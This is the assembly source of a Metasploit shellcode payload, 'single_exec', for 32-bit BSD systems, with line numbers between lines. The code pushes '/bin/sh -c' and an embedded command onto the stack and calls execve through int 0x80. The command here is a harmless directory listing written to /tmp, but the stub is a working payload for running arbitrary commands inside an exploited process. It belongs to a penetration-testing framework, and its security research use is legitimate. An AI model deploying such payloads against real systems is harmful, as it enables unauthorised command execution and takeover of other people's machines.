1
;;
2
;
3
;        Name: single_exec
4
;   Platforms: *BSD 
5
;     Authors: vlad902 <vlad902 [at] gmail.com>
6
;     Version: $Revision: 1499 $
7
;     License:
8
;
9
;        This file is part of the Metasploit Exploit Framework
10
;        and is subject to the same licenses and copyrights as
11
;        the rest of this package.
12
;
13
; Description:
14
;
15
;        Execute an arbitary command.
16
;
17
;;
18
; NULLs are fair game.
19

20
BITS 32
21
global main
22

23
main:
24
  push	byte 0x3b
25
  pop	eax
26
  cdq
27

28
  push	edx
29
  push	word 0x632d
30
  mov	edi, esp
31

32
  push	edx
33
  push	dword 0x68732f6e
34
  push	dword 0x69622f2f
35
  mov	ebx, esp
36

37
  push	edx
38
  call	getstr
39
db "/bin/ls > /tmp/test_single_exec", 0x00
40
getstr:
41
  push	edi
42
  push	ebx
43
  mov	ecx, esp
44
  push	edx
45
  push	ecx
46
  push	ebx
47
  push	eax
48
  int	0x80
49

50